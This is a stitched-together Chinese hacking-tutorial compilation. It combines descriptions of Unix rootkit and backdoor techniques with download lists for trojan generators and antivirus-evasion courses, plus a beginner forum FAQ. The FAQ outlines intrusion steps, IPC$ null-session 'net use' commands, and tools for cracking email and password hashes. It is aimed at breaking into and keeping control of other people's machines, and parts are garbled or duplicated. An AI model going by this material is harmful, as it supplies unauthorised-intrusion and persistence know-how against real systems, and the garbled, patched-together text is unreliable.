只修改日志是不够的,因为百密必有一漏,即使自认为修改了所有的日志,仍然会留下一些蛛丝马迹的。例如安装了某些后门程序,运行后也可能被管理员发现。所以,黑客高手可以通过替换一些系统程序的方法来进一步隐藏踪迹。这种用来替换正常系统程序的黑客程序叫做rootkit,这类程序在一些黑客网站可以找到,比较常见的有LinuxRootKit,现在已经发展到了5.0版本了。它可以替换系统的ls、ps、netstat、inetd等等一系列重要的系统程序,当替换了ls后,就可以隐藏指定的文件,使得管理员在使用ls命令时无法看到这些文件,从而达到隐藏自己的目的。   3.后门    一般黑客都会在攻入系统后不只一次地进入该系统。为了下次再进入系统时方便一点,黑客会留下一个后门,特洛伊木马就是后门的最好范例。Unix中留后门的方法有很多种,下面介绍几种常见的后门,供网络管理员参考防范。   密码破解后门   这是入侵者使用的最早也是最老的方法,它不仅可以获得对Unix机器的访问,而且可 以通过破解密码制造后门。这就是破解口令薄弱的帐号。以后即使管理员封了入侵者的当前帐号,这些新的帐号仍然可能是重新侵入的后门。多数情况下,入侵者寻找口令薄弱的未使用帐号,然后将口令改的难些。当管理员寻找口令薄弱的帐号是,也不会发现这些密码已修改的帐号。因而管理员很难确定查封哪个帐号。   Rhosts + + 后门   在连网的Unix机器中,象Rsh和Rlogin这样的服务是基于rhosts文件里的主机名使用简 单的认证方法。用户可以轻易的改变设置而不需口令就能进入。 入侵者只要向可以访问的某用户的rhosts文件中输入\"+ +\",就可以允许任何人从任何地方无须口令便能进 入这个帐号。特别当home目录通过NFS向外共享时,入侵者更热中于此。这些帐号也成 了入侵者再次侵入的后门。许多人更喜欢使用Rsh,因为它通常缺少日志能力. 许多管理员经常检查 \"+ +\",所以入侵者实际上多设置来自网上的另一个帐号的主机名和 用户名,从而不易被发现。   校验和及时间戳后门   早期,许多入侵者用自己的trojan程序替代二进制文件。系统管理员便依靠时间戳和系 统校验和的程序辨别一个二进制文件是否已被改变,如Unix里的sum程序。入侵者又发展了使trojan文件和原文件时间戳同步的新技术。它是这样实现的: 先将系统时钟拨 回到原文件时间,然后调整trojan文件的时间为系统时间。一旦二进制trojan文件与 原来的精确同步,就可以把系统时间设回当前时间。Sum程序是基于CRC校验,很容易 骗过。入侵者设计出了可以将trojan的校验和调整到原文件的校验和的程序。MD5是被 大多数人推荐的,MD5使用的算法目前还没人能骗过。 希望对想学黑客的人有那么一丝帮助。 真正想当黑客的人希望你能立起自己的“黑客精神”!!!!!!!!!! 黑客初级技术讲解(下)   Login后门   在Unix里,login程序通常用来对telnet来的用户进行口令验证. 入侵者获取login.c的 原代码并修改,使它在比较输入口令与存储口令时先检查后门口令。如果用户敲入后门 口令,它将忽视管理员设置的口令让你长驱直入。这将允许入侵者进入任何帐号,甚至 是root。由于后门口令是在用户真实登录并被日志记录到utmp和wtmp前产生一个访问 的,所以入侵者可以登录获取shell却不会暴露该帐号。管理员注意到这种后门后,便 用\"strings\"命令搜索login程序以寻找文本信息. 许多情况下后门口令会原形毕露。入侵者就开始加密或者更好的隐藏口令,使strings命令失效Telnetd后门   当用户telnet到系统,监听端口的inetd服务接受连接随后递给in.telnetd,由它运行 login.一些入侵者知道管理员会检查login是否被修改,就着手修改in.telnetd. 在in.telnetd内部有一些对用户信息的检验,比如用户使用了何种终端. 典型的终端 设置是Xterm或者VT100.入侵者可以做这样的后门,当终端设置为\"letmein\"时产生一 个不要任何验证的shell. 入侵者已对某些服务作了后门,对来自特定源端口的连接产 生一个shell。   服务后门   几乎所有网络服务曾被入侵者作过后门. Finger,rsh,rexec,rlogin,ftp,甚至 inetd等等的作了的版本随处多是。有的只是连接到某个TCP端口的shell,通过后门口令就能获取访问。这些程序有时用刺娲□?Ucp这样不用的服务,或者被加入inetd.conf 作为一个新的服务,管理员应该非常注意那些服务正在运行,并用MD5对原服务程序做校验。   Cronjob后门   Unix上的Cronjob可以按时间表调度特定程序的运行。入侵者可以加入后门shell程序 使它在1AM到2AM之间运行,那么每晚有一个小时可以获得访问。也可以查看cronjob中 经常运行的合法程序,同时置入后门。   库后门   几乎所有的UNIX系统使用共享库,共享库用于相同函数的重用而减少代码长度。一些入侵者在象crypt.c和_crypt.c这些函数里作了后门;象login.c这样的程序调用了 crypt()。当使用后门口令时产生一个shell。 因此,即使管理员用MD5检查login程序,仍然能产生一个后门函数,而且许多管理员并不会检查库是否被做了后门。对于许多入侵者来说有一个问题: 一些管理员对所有东西多作了MD5校验,有一种办法是入侵者对open()和文件访问函数做后门。后门函数读原文件但执行trojan后门程序。所以 当MD5读这些文件时,校验和一切正常,但当系统运行时将执行trojan版本的,即使trojan库本身也可躲过MD5校验,对于管理员来说有一种方法可以找到后门,就是静态编连MD5校验程序然后运行,静态连接程序不会使用trojan共享库。   内核后门   内核是Unix工作的核心,用于库躲过MD5校验的方法同样适用于内核级别,甚至连静态 连接多不能识别. 一个后门作的很好的内核是最难被管理员查找的,所幸的是内核的 后门程序还不是随手可得,每人知道它事实上传播有多广。  文件系统后门   入侵者需要在服务器上存储他们的掠夺品或数据,并不能被管理员发现,入侵者的文章常是包括exploit脚本工具,后门集,sniffer日志,email的备分,原代码,等等!有时为了防止管理员发现这么大的文件,入侵者需要修补\"ls\",\"du\",\"fsck\"以隐匿特定的目录和文件,在很低的级别,入侵者做这样的漏洞: 以专有的格式在硬盘上割出一部分,且表示为坏的扇区。因此入侵者只能用特别的工具访问这些隐藏的文件,对于普通的管理员来说,很难发现这些\"坏扇区\"里的文件系统,而它又确实存在。   Boot块后门   在PC世界里,许多病毒藏匿与根区,而杀病毒软件就是检查根区是否被改变。Unix下,多数管理员没有检查根区的软件,所以一些入侵者将一些后门留在根区。 . 所以更多的管理员是 用MD5校验和检测这种后门的。 隐匿进程后门   入侵者通常想隐匿他们运行的程序,这样的程序一般是口令破解程序和监听程序 (sniffer),有许多办法可以实现,这里是较通用的: 编写程序时修改自己的argv[] 使它看起来象其他进程名。可以将sniffer程序改名类似in.syslog再执行,因此 当管理员用\"ps\"检查运行进程时,出现 的是标准服务名。可以修改库函数致使 \"ps\"不能显示所有进程,可以将一个后门或程序嵌入中断驱动程序使它不会在进程表显现。使用这个技术的一个后门例子是   amod.tar.gz :   http://star.niimm.spb.su/~maillist/bugtraq.1/0777.html网络通行. 这些网络通行后 门有时允许入侵者通过防火墙进行访问。有许多网络后门程序允许入侵者建立某个端 口号并不用通过普通服务就能实现访问. 因为这是通过非标准网络端口的通行,管理 员可能忽视入侵者的足迹. 这种后门通常使用TCP,UDP和ICMP,但也可能是其他类型报文。   TCP Shell 后门   入侵者可能在防火墙没有阻塞的高位TCP端口建立这些TCP Shell后门. 许多情况下,他 们用口令进行保护以免管理员连接上后立即看到是shell访问. 管理员可以用netstat 命令查看当前的连接状态,那些端口在侦听,目前连接的来龙去脉. 通常这些后门可 以让入侵者躲过TCP Wrapper技术. 这些后门可以放在SMTP端口,许多防火墙允许 e-mail通行的.   UDP Shell 后门   管理员经常注意TCP连接并观察其怪异情况,而UDP Shell后门没有这样的连接,所以 netstat不能显示入侵者的访问痕迹,许多防火墙设置成允许类似DNS的UDP报文的通行,通常入侵者将UDP Shell放置在这个端口,允许穿越防火墙。   ICMP Shell 后门   Ping是通过发送和接受ICMP包检测机器活动状态的通用办法之一。许多防火墙允许外界ping它内部的机器,入侵者可以放数据入Ping的ICMP包,在ping的机器间形成一个shell通道,管理员也许会注意到Ping包暴风,但除了他查看包内数据,否者入侵者不会暴露。   加密连接   管理员可能建立一个sniffer试图某个访问的数据,但当入侵者给网络通行后门加密 后,就不可能被判定两台机器间的传输内容了。 <PIXTEL_MMI_EBOOK_2005>4 </PIXTEL_MMI_EBOOK_2005> 第四部分:后绪 2009价值上万元的全部黑客教程总结 我想这里有很多大家都看过,这里只是把我收集的和大家经常看到的做个总结。也好让想学黑客却找不到教程的朋友,可以省下些时间多研究下技术。 《黑鹰vip光盘全集 价值168元》 http://lib.verycd.com/2006/09/13/0000119656.html 《黑鹰基地.VIP.ASP网页教程》[ISO] http://lib.verycd.com/2006/08/22/0000116760.html 《黑鹰基地VB教程》[ISO] http://lib.verycd.com/2006/09/17/0000120309.html 《黑客基地VIP会员培训》[ISO] http://lib.verycd.com/2006/06/17/0000107321.html 《黑客基地VIP会员区视频教程》 http://lib.verycd.com/2005/06/25/0000055170.html 《黑客教程之一:黑客动画教程》动画+软件+代码[ISO] http://lib.verycd.com/2004/09/30/0000022034.html 《实用黑客攻防高手捷径》[ISO] http://lib.verycd.com/2005/10/23/0000070780.html 《计算机资源大集合》(computer resources all in one)小青豆制作[不断更新中] http://lib.verycd.com/2005/06/27/0000055364.html 《英语步步高》iso[ISO] http://lib.verycd.com/2006/07/19/0000111417.html 《小学1-6年级奥数书》20060311更新 数学神算 http://lib.verycd.com/2005/11/13/0000074600.html 《手把手系列小学数学1至6年级》iso(2cd)[ISO] http://lib.verycd.com/2005/11/14/0000074790.html 《融会贯通》[初中版][ISO] http://lib.verycd.com/2005/07/30/0000058684.html 《21天学通C语言》(Teach Yourself C in 21 Days)第六版[ISO] http://lib.verycd.com/2005/08/20/0000061808.html 《边用边学C语言视频教程 更新完毕》本视频教程完全按照高等教育自学考试C语言教材授课 http://lib.verycd.com/2005/04/09/0000045737.html __________________________________________________________________________________ H.S联盟VIP东西[黑客特训班] VIP第一课---个人电脑安全防护 http://vnet.hshack.cn/VIP/donghua/hacker/vip1anquanfanghu.rar VIP第二课---TCP/IP协议详解 http://vnet.hshack.cn/VIP/donghua/hacker/VIP1.2tcpip.rar VIP第三课---ping 命令详解 http://vnet.hshack.cn/VIP/donghua/hacker/VIP3ping.rar VIP第四课---NETSTAT http://vnet.hshack.cn/VIP/donghua/hacker/VIP4NETSTAT.rar VIP第五课---tasklist taskkill http://vnet.hshack.cn/VIP/donghua/hacker/VIP5tasklist.rar H.S黑客实用工具包 http://vnet.hshack.cn/VIP/donghua/hacker/H.Shacktools.rar VIP第六课---入侵检测 http://vnet.hshack.cn/VIP/donghua/hacker/vip6ruqinjiance.rar VIP第七课---S扫描器 http://vnet.hshack.cn/VIP/donghua/hacker/vip7scan.rar VIP第八课---3389入侵之一 http://vnet.hshack.cn/VIP/donghua/hacker/VIP83389.rar VIP第九课---3389入侵之二 http://vnet.hshack.cn/VIP/donghua/hacker/VIP93389loudong.rar VIP第十课---IPC入侵攻击 http://vnet.hshack.cn/VIP/donghua/hacker/vip10IPC.rar VIP十一课---135端口入侵 http://vnet.hshack.cn/VIP/donghua/hacker/VIPa11135.rar VIP十二课---拿4899肉鸡 http://vnet.hshack.cn/VIP/donghua/hacker/VIPA124899.rar VIP特别教程---黑客训练营-虚拟机 http://vnet.hshack.cn/VIP/donghua/hacker/HShacktebie.rar VIP十三课---灰鸽子配置及功能演示 http://vnet.hshack.cn/VIP/donghua/hacker/vipa13gezipeizhi.rar VIP十四课---灰鸽子无空间上线 http://vnet.hshack.cn/VIP/donghua/hacker/vipa14gezisx.rar VIP十五课---灰鸽子内网映射 http://vnet.hshack.cn/VIP/donghua/hacker/vipa15geziys.rar VIP十六课---RADMIN http://vnet.hshack.cn/donghua/zonghe/qianvip22.rar VIP十七课---木马特征码修改 http://vnet.hshack.cn/VIP/donghua/hacker/vipa16mmtzm.rar VIP十八课---木马免杀 http://vnet.hshack.cn/VIP/donghua/hacker/vipa18mmms.rar VIP十九课---灰鸽子2006服务端免杀 http://vnet.hshack.cn/VIP/donghua/hacker/vipa192006ms.rar VIP二十课---把别人鸽子免杀的服务端变成自己的 http://vnet.hshack.cn/VIP/donghua/hacker/vip20gezibian.rar •[网站编程班] 动态网站开发第一课 http://vnet.hshack.cn/yuanchuang/donghua/060526dw1.rar 动态网站开发第二课 http://vnet.hshack.cn/donghua/zonghe/060530dw2.rar 动态网站开发第三课 http://vnet.hshack.cn/yuanchuang/donghua/060605dw3.rar 动态网站开发第四课 http://vnet.hshack.cn/yuanchuang/donghua/050606dw4.rar 动态网站开发第五课 http://vnet.hshack.cn/yuanchuang/donghua/050608dw5.rar 动态网站开发第六课 http://vnet.hshack.cn/donghua/zonghe/060609.rar 动态网站开发第七课 http://vnet.hshack.cn/yuanchuang/donghua/050610dw7.rar 动态网站开发第八课 http://vnet.hshack.cn/yuanchuang/donghua/060613dw8.rar VIP软件下载 WOW木马生成器免杀版 http://vnet.hshack.cn/VIP/soft/06627wow.rar TT 破墙者网页木马生成器 1.0正式版 http://vnet.hshack.cn/VIP/soft/06625wangma.rar 灰鸽子专用免杀壳 http://vnet.hshack.cn/VIP/soft/06524_gezhimiansha.rar 绝爱VIP网马生成器 http://vnet.hshack.cn/VIP/soft/06524_jueaivip.rar 传奇世界木马海蓝版生成器 http://vnet.hshack.cn/VIP/soft/06524_wooolvip.rar 梦幻木马 http://vnet.hshack.cn/vip/soft/060522mh.rar 最新梦幻西游戏生成器 空间收信 http://vnet.hshack.cn/VIP/soft/06521menghuankongjian.rar QQ冲击波V3.4 (无壳版)所有VIP功能 http://vnet.hshack.cn/VIP/soft/06521qqcjb.rar __________________________________________________________________________________ 新世纪网安基地免费VIP教程 http://down.520hack.com/donghua/200607/hackgf/lesson1.rar http://down.520hack.com/donghua/200607/hackgf/lesson2.rar http://down.520hack.com/donghua/200607/hackgf/lesson3.rar http://down.520hack.com/donghua/200607/hackgf/lesson4.rar http://down.520hack.com/donghua/200607/hackgf/lesson5.rar http://down.520hack.com/donghua/200607/hackgf/lesson6.rar http://down.520hack.com/donghua/200607/hackgf/lesson7.rar http://down.520hack.com/donghua/200607/hackgf/lesson8.rar http://down.520hack.com/donghua/200607/hackgf/lesson9.rar http://down.520hack.com/donghua/200607/hackgf/lesson10.rar http://down.520hack.com/donghua/200607/hackgf/lesson11.rar http://down.520hack.com/donghua/200607/hackgf/lesson12.rar http://down.520hack.com/donghua/200607/hackgf/lesson13.rar http://down.520hack.com/donghua/200607/hackgf/lesson14.rar http://down.520hack.com/donghua/200607/hackgf/lesson15.rar http://down.520hack.com/donghua/200607/hackgf/lesson16.rar http://down.520hack.com/donghua/200607/hackgf/lesson17.rar http://down.520hack.com/donghua/200607/hackgf/lesson18.rar http://down.520hack.com/donghua/200607/hackgf/lesson19.rar http://down.520hack.com/donghua/200607/hackgf/lesson20.rar http://down.520hack.com/donghua/200607/hackgf/lesson21.rar http://down.520hack.com/donghua/200607/hackgf/lesson22.rar http://down.520hack.com/donghua/200607/hackgf/lesson23.rar http://down.520hack.com/donghua/200607/hackgf/lesson24.rar http://down.520hack.com/donghua/200607/hackgf/lesson25.rar =================================================================================== 一个老鸟的经典收藏 经典网址 小西的黑客教程(菜鸟版) http://www.sandflee.net/down/show.asp?id=213&down=1 流光教程电子版 http://www.sandflee.net/down/show.asp?id=34&down=1 三陀工作室整理的delphi和黑客技巧1.5 http://stgzs.myetang.com/hack/delphitechv1.5.chm 终端服务的电子书 http://www.sandflee.net/wawa/tools/termsrv.zip ncc制作的超级菜鸟黑客速成 http://www.heibai.net/download/show.php?id=2136 溯雪 光影 小榕 论坛精华集 http://www.andyxu.net/banana/tools/netxeyes.chm 安全焦点文档精华 http://www.andyxu.net/banana/tools/xfocus_doc.rar 鹰派的网络经典教材 http://www.sandflee.net/down/show.asp?id=63&down=1 rick的unix教材 http://www.sandflee.net/down/show.asp?id=153&down=1 幻影旅团 团长:刺 写的黑客教程 http://mybanqiao.jia.net/rije/banana/tools/hy.rar 菜牛兄写的汉化与破解软件教程 http://mybanqiao.jia.net/rije/banana/tools/niu.rar 单机安装web服务,ftp服务,imail邮件服务,和超级雷傲论坛全攻略 http://www.andyxu.net/banana/tools/web.chm 雾中鸟的《系统网络入侵方法小结》 http://www.sandflee.net/down/show.asp?id=114&down=1 傲气雄鹰的教程 http://scfly.3322.net/ 轰天炮写的黑客入门 http://mybanqiao.jia.net/rije/banana/tools/htp.rar 《黑客攻防指南》第一期 http://www.heibai.net/download/show.php?id=2216&down=1 小铭写的《网络最菜黑客指南》 http://www.heibai.net/download/show.php?id=1808&down=1 黑客防线全站教程 http://www.andyxu.net/banana/tools/banana_01.rar 菜鸟宝典 http://www.haowawa.com/down/cainiao.zip 黑客基础教材 论坛成员沉睡不醒收集制作 http://www.sandflee.net/down/show.asp?id=241&down=1 小西的黑客教程(菜鸟版) http://www.sandflee.net/down/show.asp?id=213&down=1 流光教程电子版 http://www.sandflee.net/down/show.asp?id=34&down=1 三陀工作室整理的delphi和黑客技巧1.5 http://stgzs.myetang.com/hack/delphitechv1.5.chm 终端服务的电子书 http://www.sandflee.net/wawa/tools/termsrv.zip ncc制作的超级菜鸟黑客速成 http://www.heibai.net/download/show.php?id=2136 溯雪 光影 小榕 论坛精华集 http://www.andyxu.net/banana/tools/netxeyes.chm 安全焦点文档精华 http://www.andyxu.net/banana/tools/xfocus_doc.rar 鹰派的网络经典教材 http://www.sandflee.net/down/show.asp?id=63&down=1 rick的unix教材 http://www.sandflee.net/down/show.asp?id=153&down=1 幻影旅团 团长:刺 写的黑客教程 http://mybanqiao.jia.net/rije/banana/tools/hy.rar 菜牛兄写的汉化与破解软件教程 http://mybanqiao.jia.net/rije/banana/tools/niu.rar 单机安装web服务,ftp服务,imail邮件服务,和超级雷傲论坛全攻略 http://www.andyxu.net/banana/tools/web.chm 雾中鸟的《系统网络入侵方法小结》 http://www.sandflee.net/down/show.asp?id=114&down=1 傲气雄鹰的教程 http://scfly.3322.net/ 轰天炮写的黑客入门 http://mybanqiao.jia.net/rije/banana/tools/htp.rar 《黑客攻防指南》第一期 http://www.heibai.net/download/show.php?id=2216&down=1 小铭写的《网络最菜黑客指南》 http://www.heibai.net/download/show.php?id=1808&down=1 黑客防线全站教程 http://www.andyxu.net/banana/tools/banana_01.rar 菜鸟宝典 http://www.haowawa.com/down/cainiao.zip 黑客基础教材 论坛成员沉睡不醒收集制作 http://www.sandflee.net/down/show.asp?id=241&down=1 菜鸟来看看--必定有收益!(强力推荐) 很早就想总结一下新手常见的问题和回答了。但一直没有空出时间来做。在论坛久了,发现一个不得不解决的问题,就是重复发问。一个问题被换汤不换药地反复提出,如果不回答就会被认为摆架子、有违“零起点”的称号;如果详细回答实在是浪费时间;如果简单的说几句,让提问的人自己找资料还是很难让人满意。尤其是现在,只有认证会员才能搜索了。于是出现了一些请人帮忙找资料的情况。要么就是申请得到会员认证。大家的精力就被这样消耗了。 所谓“林子大了什么鸟都有”。论坛上大家水平参差不齐,有时一个“低层次”的问题高手懒得答,自以为高手的答不好,甚至有人回个伤人的回答,弄的很不愉快。作为一名版主,我要求自己耐心细致尽自己所能地回答问题,但有些问题实在让人上火(也许是我脾气不好吧)。我简单的答(孰我能力有限)他认为版主在敷衍,我语气重了他认为你欺负菜鸟。这个…… 发了堆牢骚,其实就是希望大家能相互理解,理解,再理解。 下面进入正题。我看了最近的50几页帖子,归纳出一些常见的问题,然后查找相关的回答,分类记下。再写一些自己的说明,帮助新手理解和快速入门。由于本人水平有限,下面的表述有错误和不足的地方,还请各位高手详细指出。我会立刻修改的。这里的版主认为如果认为有什么地方不妥的,就直接修改吧。如果大家有什么建议也请发短消息或跟帖告诉我。不过这是给新手看的,千万不要要求太高哦。 不该问的问题 简单说明: 我很无奈地吧这条放在了第一位。 相关帖子: 找软件 在这里 华军软件园 http://bj2.onlinedown.net/ 找代理 在这里 http://search.lycos.com.cn/dir/comp...e_proxy_server/ http://www8.big.or.jp/~000/cybersyndrome/psr3.html 找师傅 论坛就是你的“老师”。 找注册码 在这里 http://www.skycn.com/soft/4445.html 关于认证会员和搜索功能 简单说明: 为了保证服务器的正常工作,现在只有认证会员才能使用搜索功能。另外,认证会员还有资格进入“永远的灰色轨迹”版。要想成为认证会员并不难,但也不简单。你应该努力提高自己,积极帮助别人,多发有质量的帖子(包括提问和回答)。如果你真心融入论坛大家庭,你得到的将绝不仅仅是一个认证资格。 相关帖子: 关于认证问题的讨论: http://www.sandflee.net/cgi-bin/lb5...=10485&show=352 关于被入侵 简单说明: 经常有帖子说:“我中xx木马啦,怎么办?”、“我的windows有问题,是不是被入侵啦?”等等。通用的做法是查看可疑进程(win98需要用相关工具)、注册表启动项、服务、开放端口等,然后更新病毒库,杀毒。前提是你要有一定的电脑常识并对你的系统比较了解,才能分别正常与否。如果你自己对电脑一窍不通,那在论坛别人也很难帮助你。其实就像对付现实中的病毒一样,应该预防为主。杀毒软件和网络防火墙可以抵御绝大部分危险,自身安全知识的提高则是最根本的保障。最新的病毒相关知识可以到杀毒软件公司的主页上找。另外,系统不正常也可能是操作失误引起的。这里是“黑客零起点”不是“电脑零起点”,所以关于系统修复的问题,请不要在论坛提了。 相关工具: active ports 监视自己电脑的端口 http://www.isgrey.com/down/show.asp?id=215&down=1 windows优化大师4.9 它的进程管理功能不错 http://gwbn.onlinedown.net/down/wom49.exe fport-2.0 查看端口关联的进程 http://www.heibai.net/download/show.php?id=2670&down=1 mport 比fport更胜一筹的工具 http://www.sandflee.net/down/show.asp?id=247&down=1 相关帖子: 关于广外女生木马的手工清除方法 http://www.sandflee.net/txt/list.asp?id=128 把灰鸽子赶尽杀绝 http://www.sandflee.net/txt/list.asp?id=181 清除恶意网页的破坏 http://it.rising.com.cn/default/spclean.htm http://it.rising.com.cn/default/clean.htm 对付win2kpass http://www.sandflee.net/cgi-bin/lb5...=10401&show=396 2000系统进程总列表 http://www.sandflee.net/cgi-bin/lb5...c=9268&show=748 木马的检测、清除及其预防 http://www.s8s8.net/cgi-bin/topic.c...ic=17013&show=0 关于基础知识和入侵步骤 简单说明: 电脑和网络知识可算是做黑客的基础的基础,至少你要先了解了它们再来看下面的帖子。看完这部分的帖子,你也只是算站到了“零起点”上,路还长着呢。这里我再多说几句关于入侵步骤的话,给新手做个引导。所谓入侵,可以理解为未授权的访问。既然是未授权的,就需要借助一些非常规的手段,即通常所说的利用漏洞。 1,要利用漏洞首先要发现它。端口扫描和漏洞扫描就是“敲门砖”。可以对大量目标做一般扫描,也可以对单一目标做重点扫描。或者两者结合。当你对漏洞熟悉时,你可以只通过端口扫描就能了解目标的可能有的漏洞。这样既提高效率又不易被记录日志。 2,找到漏洞后的利用问题,是千差万别的。这正是新手学要学习的地方之一。这里就不多说了。 3,利用漏洞的目的是什么呢?是控制对方,即是获得远程shell。shell这个概念是从unix下继承过来的,是指与操作系统核心的一种交互方式和界面。典型的例子是telnet。得到shell的办法有很多种,比如通过系统自带的telnet,终端服务。或者用木马和工具提供的,如winshell,冰河等等。 4,shell是有权限差别的。最高权限——管理员权限才是我们的目标。所以有时会有提升权限的问题。当然,这也是利用了漏洞。 5,有了shell还要扩大它,就是进一步获得更好用的shell。命令行的到图形的、功能少的到多的。于是才有了“怎么开3389”,“怎么上传”之类问题。 6,为了下次还能控制目标,你需要保持shell。做一个好的后门又是一种“学问”。克隆帐号、埋木马、破administrator的密码,手段不一而足。各位慢慢学吧。 相关帖子: 如何成为一名黑客 http://www.hack86.com/bbs/thread.php?fid=11 提问的技巧 http://www.sandflee.net/cgi-bin/lb5...rum=1&topic=523 tcp/ip基础介绍 http://article.cnhope.org/list.asp?id=659 网络攻防教程 http://www.netsill.com/wenzhang/list.asp?id=115 网络入侵步骤及思路 http://www.s8s8.net/cgi-bin/topic.c...=14970&show=140 几种扫描器的使用教程 http://www.chinesehack.org/file/show.asp?id=5614 全球ip分配表 http://www.sandflee.net/cgi-bin/lb5...4&start=0&show= 黑客入门教程 http://www.heibai.net/article/show.php?id=2515 关于命令的使用 简单说明: windowsnt/2000 下有丰富的cmd可供使用,其作用也是巨大的。完全值得去熟练掌握她它们。windows2000本身就提供了详细的命令帮助。在开始菜单--》帮助中可以搜索到“windows 2000 命令参考”。强烈建议各位新手花些时间仔细看一遍。装了比如iis等软件,就会有新的命令(iisreset),在命令行方式下加/?或-h参数可以查看帮助,其他内置的命令当然也可以。 相关帖子: ftp命令: http://www.sandflee.net/cgi-bin/lb5...pic=227&show=75 telnet命令: http://www.heibai.net/article/show.php?id=578 net命令: http://www.sandflee.net/txt/list.asp?id=143 tftp命令: http://www.sandflee.net/cgi-bin/lb5...orum=3&topic=32 一般入侵所需要的几个常用命令 http://www.sandflee.net/cgi-bin/lb5...um=1&topic=4242 关于端口 相关工具: 扫描端口是扫描器的基本功能,工具太多了。看后面的“常用工具的使用”这部分。 相关帖子: 端口扫描简介 http://www.s8s8.net/cgi-bin/topic.c...c=15063&show=60 常见端口一览表 http://www.s8s8.net/cgi-bin/topic.c...=25&topic=14801 常见端口详解及部分攻击策略 http://www.sandflee.net/txt/list.asp?id=116 关于windows98 简单说明: 这类问题有两种:一是怎样入侵win98系统,二是在win98怎样入侵。 由于98对网络的支持不完善,使得问题的解决远没有像对2000那样“丰富多采”。98默认没有什么网络服务启动,也就找不到什么可利用的漏洞。共享算是最常见的“服务”了。我简单的写了些利用方法放在这里: http://home.getdns.net/web/eva/98.txt 其他还有些方法,比如嗅探密码、发病毒和木马到信箱、甚至用qq“联络感情”再传个绑木马的flash等,没什么意思,就此打住。 基于同样的理由,98不是一个好的攻击平台。如果只是端口扫描,那么superscan可以胜任。web类的漏洞扫描x-scan也可以。但涉及ipc$的弱口令、漏洞、远程控制工具以及连接一些服务(如sql)就要“基于nt技术构建”的os了。好在3389终端服务的客户端可以是98,所以先搞一台开 3389的肉鸡就算是回避了问题。如果你还在用98,诚恳的建议你:请用2000。如果你在网吧,先试试入侵网吧服务器。 鉴于98的问题技术含量不高、没有深入探讨价值,所以如果不是特别的问题就请不用发帖了。(个人观点) 相关工具: netpass 1.0 破解98共享密码 http://www.heibai.net/download/show.php?id=1465&down=1 cain v2.5 综合破解工具 http://www.heibai.net/download/show.php?id=2585&down=1 exebinderz 1.3 exe捆绑机 (我用pe压了一下,暂时不会被杀了) http://www.v86.net/net/file/zzzevazzz/exebinderz1.3.zip 关于破解邮箱 相关工具: 溯雪 http://www.netxeyes.org/dansnowb7setup.exe 溯雪中文补丁 http://www.netxeyes.org/dansnowb7_cn.zip (先安装英文版,释放到原英文版目录即可) 相关帖子: 溯雪破解21cn信箱的完整教程 http://www.heibai.net/download/show.php?id=1263 关于解除网吧、网页限制 破解右键: http://www.sandflee.net/cgi-bin/lb5...=2215&show=1078 破解硬盘还原卡: http://www.heibai.net/article/show.php?id=2488 http://www.heibai.net/article/show.php?id=1939 破解美屏: http://article.cnhope.org/list.asp?id=574 http://www.heibai.net/article/show.php?id=2546 相关网址: http://webmaster.diy.163.com/cy07/ 相关工具: 网吧幽灵1.8 http://www.heibai.net/download/show.php?id=2847&down=1 关于流光 简单说明: 流光实在是个十分出色的综合工具。其易用性和实用性都很适合新手使用。还没用过的立刻下载一个装上,自己体验一下吧。使用前建议看看自带的说明。 相关工具: 流光4.7 http://www.netxeyes.org/fluxay47/fl...ld3200setup.exe 流光4.7破解补丁 http://www.heibai.net/download/show.php?id=2422 常见问题和回答: 1,我下载的流光杀毒软件说**毒,怎么会事? 答:一些杀毒软件的确认为流光是木马(谁让它这么有名呢,呵呵)。如果杀毒,流光将无法使用,所以只有让杀毒软件停止监测。或者使用不认为流光是病毒的软件,比如金山毒霸。 2,为什么有些肉鸡安装sensor失败? 答:如果拷贝文件出错,可能是因为目标admin$共享未开放。请采用其他shell,在目标主机上执行net share admin$命令。 如果启动服务失败,可能因为使用的端口已经被占用,换个试试;也可能目标有杀毒软件删除了文件,或者有防火墙阻止sensor连网,没有什么好的解决办法。 3,为什么一些流光扫到的密码不能用? 答:可能是误报,将扫描速度降低些再扫。对于winxp目标,也会产生误报。也可能因为你用扫到的非管理员帐号来连接目标,请在ipc$扫描选项里将“只对administrators组进行猜解”选上。 关于字典 简单说明: 操作系统将用户和密码信息加密后存放在特定的地方和文件中。典型的如windowsnt里的sam文件和linux里的etc/passwd。由于加密算法是单向散列的,所以几乎不可能找到逆向算法。因此,不得不使用同样的算法加密各种口令,将结果去吻合散列值。字典就是有选择地储存了一批口令的文件。例如生日、常用单词、中文名字的拼音等。著名的破解密码的工具,一般自带一些字典。也可以使用字典工具制作符合要求的字典。 相关工具: 乱刀 小榕出品,破解unix系统的密码 http://www.netxeyes.org/bladese.exe john 最著名的unix密码破解工具(windows版) http://www.heibai.net/download/show.php?id=1595&down=1 producepass 通用字典生成器 http://www.heibai.net/download/show.php?id=2666&down=3 hh_dictall 英文单词大全字典 http://www.heibai.net/download/show.php?id=396&down=1 sr-password 生日密码生成器 http://www.heibai.net/download/show.php?id=2442&down=1 关于ipc$、空连接和默认共享 简单说明: 首先需要指出的是空连接和ipc$是不同的概念。空连接是在没有信任的情况下与服务器建立的会话,换句话说,它是一个到服务器的匿名访问。ipc$是为了让进程间通信而开放的命名管道,可以通过验证用户名和密码获得相应的权限。有许多的工具必须用到ipc$。默认共享是为了方便远程管理而开放的共享,包含了所有的逻辑盘(c$,d$,e$……)和系统目录winnt或windows(admin$)。 相关帖子: 尝试自己解决问题的学习思路 http://www.sandflee.net/txt/list.asp?id=100 ipc进攻方法 http://www.sandflee.net/cgi-bin/lb5...=2498&show=1034 常见问题和回答: 1,怎样建立空连接,它有什么用? 答:使用命令 net use \\ip\ipc$ "" /user:"" 就可以简单地和目标建立一个空连接(需要目标开放ipc$)。 对于nt,在默认安全设置下,借助空连接可以列举目标用户、共享,访问everyone权限的共享,访问小部分注册表等,没有什么利用价值。对2000作用就更小了。而且实现也不方便,需借助工具。如果你不理解“没用”的东西为什么还会存在,就看看“专业”的解释吧: 在nt/2000下的空连接 http://www.3389.net/bbs/dispbbs.asp...d=3424&page=1: 解剖win2k下的空会话 http://www.sandflee.net/txt/list.asp?id=117 2,为什么我连不上ipc$? 答:1,只有nt/2000/xp及以上系统才可以建立ipc$。如果你用的是98/me是没有该功能的。 2,确认你的命令没有打错。正确的命令是: net use \\目标ip\ipc$ "密码" /user:"用户名" 注意别多了或少了空格。当用户名和密码中不包含空格时两边的双引号可以省略。空密码用""表示。 3,根据返回的错误号分析原因: 